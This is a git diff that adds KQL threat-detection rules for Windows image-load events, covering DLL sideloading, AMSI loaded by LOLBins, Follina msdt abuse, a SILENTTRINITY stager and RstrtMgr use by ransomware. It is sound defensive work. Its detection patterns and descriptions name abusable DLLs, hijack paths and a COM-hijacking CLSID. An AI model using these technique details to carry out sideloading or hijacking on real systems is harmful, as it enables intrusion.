+| where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (FolderPath endswith ".jse" or FolderPath endswith ".vbe" or FolderPath endswith ".js" or FolderPath endswith ".vba" or FolderPath endswith ".vbs") and (FolderPath startswith "C:\\Users\\" or FolderPath startswith "C:\\ProgramData")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/abusable_dll_potential_sideloading_from_suspicious_location.kql b/KQL/rules/windows/image_load/abusable_dll_potential_sideloading_from_suspicious_location.kql
new file mode 100644
index 00000000..a98f0e08
--- /dev/null
+++ b/KQL/rules/windows/image_load/abusable_dll_potential_sideloading_from_suspicious_location.kql
@@ -0,0 +1,10 @@
+// Title: Abusable DLL Potential Sideloading From Suspicious Location
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-11
+// Level: high
+// Description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\coreclr.dll" or FolderPath endswith "\\facesdk.dll" or FolderPath endswith "\\HPCustPartUI.dll" or FolderPath endswith "\\libcef.dll" or FolderPath endswith "\\ZIPDLL.dll") and ((FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\Temporary Internet" or FolderPath contains "\\Windows\\Temp\\") or ((FolderPath contains ":\\Users\\" and FolderPath contains "\\Favorites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Favourites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Contacts\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/amsi_dll_loaded_via_lolbin_process.kql b/KQL/rules/windows/image_load/amsi_dll_loaded_via_lolbin_process.kql
new file mode 100644
index 00000000..6a46db3a
--- /dev/null
+++ b/KQL/rules/windows/image_load/amsi_dll_loaded_via_lolbin_process.kql
@@ -0,0 +1,10 @@
+// Title: Amsi.DLL Loaded Via LOLBIN Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-01
+// Level: medium
+// Description: Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\amsi.dll" and (InitiatingProcessFolderPath endswith "\\ExtExport.exe" or InitiatingProcessFolderPath endswith "\\odbcconf.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/aruba_network_service_potential_dll_sideloading.kql b/KQL/rules/windows/image_load/aruba_network_service_potential_dll_sideloading.kql
new file mode 100644
index 00000000..b905f641
--- /dev/null
+++ b/KQL/rules/windows/image_load/aruba_network_service_potential_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Aruba Network Service Potential DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-22
+// Level: high
+// Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1574.001
+
+DeviceImageLoadEvents
+| where ((FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\msvcr100.dll" or FolderPath endswith "\\msvcp100.dll" or FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\dpapi.dll") and InitiatingProcessFolderPath endswith "\\arubanetsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/baaupdate_exe_suspicious_dll_load.kql b/KQL/rules/windows/image_load/baaupdate_exe_suspicious_dll_load.kql
new file mode 100644
index 00000000..33fcffde
--- /dev/null
+++ b/KQL/rules/windows/image_load/baaupdate_exe_suspicious_dll_load.kql
@@ -0,0 +1,12 @@
+// Title: BaaUpdate.exe Suspicious DLL Load
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-18
+// Level: high
+// Description: Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM & COM Hijacking.
+// This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94)
+// which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003
+
+DeviceImageLoadEvents
+| where (FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\Default\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains "\\Contacts\\" or FolderPath contains "\\Favorites\\" or FolderPath contains "\\Favourites\\" or FolderPath contains "\\Links\\" or FolderPath contains "\\Music\\" or FolderPath contains "\\Pictures\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Temporary Internet" or FolderPath contains "\\Videos\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\BaaUpdate.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql b/KQL/rules/windows/image_load/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql
new file mode 100644
index 00000000..8f3be24d
--- /dev/null
+++ b/KQL/rules/windows/image_load/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql
@@ -0,0 +1,10 @@
+// Title: Clfs.SYS Loaded By Process Located In a Potential Suspicious Location
+// Author: X__Junior
+// Date: 2025-01-20
+// Level: medium
+// Description: Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVEs exploits that targets Common Log File.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\clfs.sys" and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/clr_dll_loaded_via_office_applications.kql b/KQL/rules/windows/image_load/clr_dll_loaded_via_office_applications.kql
new file mode 100644
index 00000000..8168f9fc
--- /dev/null
+++ b/KQL/rules/windows/image_load/clr_dll_loaded_via_office_applications.kql
@@ -0,0 +1,10 @@
+// Title: CLR DLL Loaded Via Office Applications
+// Author: Antonlovesdnb
+// Date: 2020-02-19
+// Level: medium
+// Description: Detects CLR DLL being loaded by an Office Product
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+
+DeviceImageLoadEvents
+| where FolderPath contains "\\clr.dll" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql b/KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql
new file mode 100644
index 00000000..8eb0fba6
--- /dev/null
+++ b/KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql
@@ -0,0 +1,12 @@
+// Title: CredUI.DLL Loaded By Uncommon Process
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-20
+// Level: medium
+// Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.collection, attack.t1056.002
+// False Positives:
+//   - Other legitimate processes loading those DLLs in your environment.
+
+DeviceImageLoadEvents
+| where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SystemApps\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql b/KQL/rules/windows/image_load/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql
new file mode 100644
index 00000000..3a11d65f
--- /dev/null
+++ b/KQL/rules/windows/image_load/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql
@@ -0,0 +1,10 @@
+// Title: Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE
+// Author: Greg (rule)
+// Date: 2022-06-17
+// Level: high
+// Description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202, cve.2022-30190
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\sdiageng.dll" and InitiatingProcessFolderPath endswith "\\msdt.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/dll_load_by_system_process_from_suspicious_locations.kql b/KQL/rules/windows/image_load/dll_load_by_system_process_from_suspicious_locations.kql
new file mode 100644
index 00000000..a5fdf8f1
--- /dev/null
+++ b/KQL/rules/windows/image_load/dll_load_by_system_process_from_suspicious_locations.kql
@@ -0,0 +1,10 @@
+// Title: DLL Load By System Process From Suspicious Locations
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-17
+// Level: medium
+// Description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+
+DeviceImageLoadEvents
+| where (FolderPath startswith "C:\\Users\\Public\\" or FolderPath startswith "C:\\PerfLogs\\") and InitiatingProcessFolderPath startswith "C:\\Windows\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/dll_loaded_from_suspicious_location_via_cmspt_exe.kql b/KQL/rules/windows/image_load/dll_loaded_from_suspicious_location_via_cmspt_exe.kql
new file mode 100644
index 00000000..0c9a11c2
--- /dev/null
+++ b/KQL/rules/windows/image_load/dll_loaded_from_suspicious_location_via_cmspt_exe.kql
@@ -0,0 +1,12 @@
+// Title: DLL Loaded From Suspicious Location Via Cmspt.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-30
+// Level: high
+// Description: Detects cmstp loading "dll" or "ocx" files from suspicious locations
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.003
+// False Positives:
+//   - Unikely
+
+DeviceImageLoadEvents
+| where (FolderPath contains "\\PerfLogs\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Users\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and (FolderPath endswith ".dll" or FolderPath endswith ".ocx") and InitiatingProcessFolderPath endswith "\\cmstp.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/dll_sideloading_of_shellchromeapi_dll.kql b/KQL/rules/windows/image_load/dll_sideloading_of_shellchromeapi_dll.kql
new file mode 100644
index 00000000..347799d8
--- /dev/null
+++ b/KQL/rules/windows/image_load/dll_sideloading_of_shellchromeapi_dll.kql
@@ -0,0 +1,11 @@
+// Title: DLL Sideloading Of ShellChromeAPI.DLL
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-01
+// Level: high
+// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL.
+// Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\ShellChromeAPI.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/dotnet_assembly_dll_loaded_via_office_application.kql b/KQL/rules/windows/image_load/dotnet_assembly_dll_loaded_via_office_application.kql
new file mode 100644
index 00000000..91e634ef
--- /dev/null
+++ b/KQL/rules/windows/image_load/dotnet_assembly_dll_loaded_via_office_application.kql
@@ -0,0 +1,10 @@
+// Title: DotNET Assembly DLL Loaded Via Office Application
+// Author: Antonlovesdnb
+// Date: 2020-02-19
+// Level: medium
+// Description: Detects any assembly DLL being loaded by an Office Product
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+
+DeviceImageLoadEvents
+| where FolderPath startswith "C:\\Windows\\assembly\\" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/dotnet_clr_dll_loaded_by_scripting_applications.kql b/KQL/rules/windows/image_load/dotnet_clr_dll_loaded_by_scripting_applications.kql
new file mode 100644
index 00000000..c35cf26f
--- /dev/null
+++ b/KQL/rules/windows/image_load/dotnet_clr_dll_loaded_by_scripting_applications.kql
@@ -0,0 +1,10 @@
+// Title: DotNet CLR DLL Loaded By Scripting Applications
+// Author: omkar72, oscd.community
+// Date: 2020-10-14
+// Level: high
+// Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.privilege-escalation, attack.t1055
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\clr.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\mscorlib.dll") and (InitiatingProcessFolderPath endswith "\\cmstp.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\msxsl.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/fax_service_dll_search_order_hijack.kql b/KQL/rules/windows/image_load/fax_service_dll_search_order_hijack.kql
new file mode 100644
index 00000000..0a56d66a
--- /dev/null
+++ b/KQL/rules/windows/image_load/fax_service_dll_search_order_hijack.kql
@@ -0,0 +1,12 @@
+// Title: Fax Service DLL Search Order Hijack
+// Author: NVISO
+// Date: 2020-05-04
+// Level: high
+// Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "ualapi.dll" and InitiatingProcessFolderPath endswith "\\fxssvc.exe") and (not(FolderPath startswith "C:\\Windows\\WinSxS\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/gac_dll_loaded_via_office_applications.kql b/KQL/rules/windows/image_load/gac_dll_loaded_via_office_applications.kql
new file mode 100644
index 00000000..8dd7b57c
--- /dev/null
+++ b/KQL/rules/windows/image_load/gac_dll_loaded_via_office_applications.kql
@@ -0,0 +1,12 @@
+// Title: GAC DLL Loaded Via Office Applications
+// Author: Antonlovesdnb
+// Date: 2020-02-19
+// Level: high
+// Description: Detects any GAC DLL being loaded by an Office Product
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+//   - Legitimate macro usage. Add the appropriate filter according to your environment
+
+DeviceImageLoadEvents
+| where FolderPath startswith "C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/hacktool_silenttrinity_stager_dll_load.kql b/KQL/rules/windows/image_load/hacktool_silenttrinity_stager_dll_load.kql
new file mode 100644
index 00000000..1db7a2b1
--- /dev/null
+++ b/KQL/rules/windows/image_load/hacktool_silenttrinity_stager_dll_load.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SILENTTRINITY Stager DLL Load
+// Author: Aleksey Potapov, oscd.community
+// Date: 2019-10-22
+// Level: high
+// Description: Detects SILENTTRINITY stager dll loading activity
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where InitiatingProcessVersionInfoFileDescription contains "st2stager"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_a_suspicious_process.kql b/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_a_suspicious_process.kql
new file mode 100644
index 00000000..55ec5c4e
--- /dev/null
+++ b/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_a_suspicious_process.kql
@@ -0,0 +1,14 @@
+// Title: Load Of RstrtMgr.DLL By A Suspicious Process
+// Author: Luc Génaux
+// Date: 2023-11-28
+// Level: high
+// Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.
+// This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
+// It could also be used for anti-analysis purposes by shut downing specific processes.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001
+// False Positives:
+//   - Processes related to software installation
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql b/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql
new file mode 100644
index 00000000..157e46ac
--- /dev/null
+++ b/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql
@@ -0,0 +1,15 @@
+// Title: Load Of RstrtMgr.DLL By An Uncommon Process
+// Author: Luc Génaux
+// Date: 2023-11-28
+// Level: low
+// Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.
+// This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
+// It could also be used for anti-analysis purposes by shut downing specific processes.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001
+// False Positives:
+//   - Other legitimate Windows processes not currently listed
+//   - Processes related to software installation
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\'" or (InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\'" or InitiatingProcessFolderPath startswith "C:\\$WinREAgent\\'" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\'" or InitiatingProcessFolderPath startswith "C:\\Program Files\\'" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\explorer.exe'" or InitiatingProcessFolderPath startswith "C:\\Windows\\SoftwareDistribution\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysNative\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\'" or InitiatingProcessFolderPath startswith "C:\\WUDownloadCache\\'") or ((InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp" and InitiatingProcessFolderPath startswith "C:\\Users\\'")))) and (not((InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/microsoft_excel_add_in_loaded_from_uncommon_location.kql b/KQL/rules/windows/image_load/microsoft_excel_add_in_loaded_from_uncommon_location.kql
new file mode 100644
index 00000000..0ed18510
--- /dev/null
+++ b/KQL/rules/windows/image_load/microsoft_excel_add_in_loaded_from_uncommon_location.kql
@@ -0,0 +1,12 @@
+// Title: Microsoft Excel Add-In Loaded From Uncommon Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-12
+// Level: medium
+// Description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+//   - Some tuning might be required to allow or remove certain locations used by the rule if you consider them as safe locations
+
+DeviceImageLoadEvents
+| where (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Perflogs\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Tasks\\") and FolderPath endswith ".xll" and InitiatingProcessFolderPath endswith "\\excel.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/microsoft_office_dll_sideload.kql b/KQL/rules/windows/image_load/microsoft_office_dll_sideload.kql
new file mode 100644
index 00000000..cc3a6a0c
--- /dev/null
+++ b/KQL/rules/windows/image_load/microsoft_office_dll_sideload.kql
@@ -0,0 +1,12 @@
+// Title: Microsoft Office DLL Sideload
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-08-17
+// Level: high
+// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql b/KQL/rules/windows/image_load/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql
new file mode 100644
index 00000000..61e657fb
--- /dev/null
+++ b/KQL/rules/windows/image_load/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql
@@ -0,0 +1,12 @@
+// Title: Microsoft VBA For Outlook Addin Loaded Via Outlook
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: medium
+// Description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+//   - Legitimate macro usage. Add the appropriate filter according to your environment
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\outlvba.dll" and InitiatingProcessFolderPath endswith "\\outlook.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/mmc_loading_script_engines_dlls.kql b/KQL/rules/windows/image_load/mmc_loading_script_engines_dlls.kql
new file mode 100644
index 00000000..460baa31
--- /dev/null
+++ b/KQL/rules/windows/image_load/mmc_loading_script_engines_dlls.kql
@@ -0,0 +1,13 @@
+// Title: MMC Loading Script Engines DLLs
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: medium
+// Description: Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt
+// to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059.005, attack.t1218.014
+// False Positives:
+//   - Legitimate MMC operations or extensions loading these libraries
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\jscript9.dll") and InitiatingProcessFolderPath endswith "\\mmc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/pcre_net_package_image_load.kql b/KQL/rules/windows/image_load/pcre_net_package_image_load.kql
new file mode 100644
index 00000000..27eb3c9d
--- /dev/null
+++ b/KQL/rules/windows/image_load/pcre_net_package_image_load.kql
@@ -0,0 +1,10 @@
+// Title: PCRE.NET Package Image Load
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-29
+// Level: high
+// Description: Detects processes loading modules related to PCRE.NET package
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceImageLoadEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_7za_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_7za_dll_sideloading.kql
new file mode 100644
index 00000000..a24b501c
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_7za_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential 7za.DLL Sideloading
+// Author: X__Junior
+// Date: 2023-06-09
+// Level: low
+// Description: Detects potential DLL sideloading of "7za.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - Legitimate third party application located in "AppData" may leverage this DLL to offer 7z compression functionality and may generate false positives. Apply additional filters as needed.
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\"))))
\ No newline at end of file
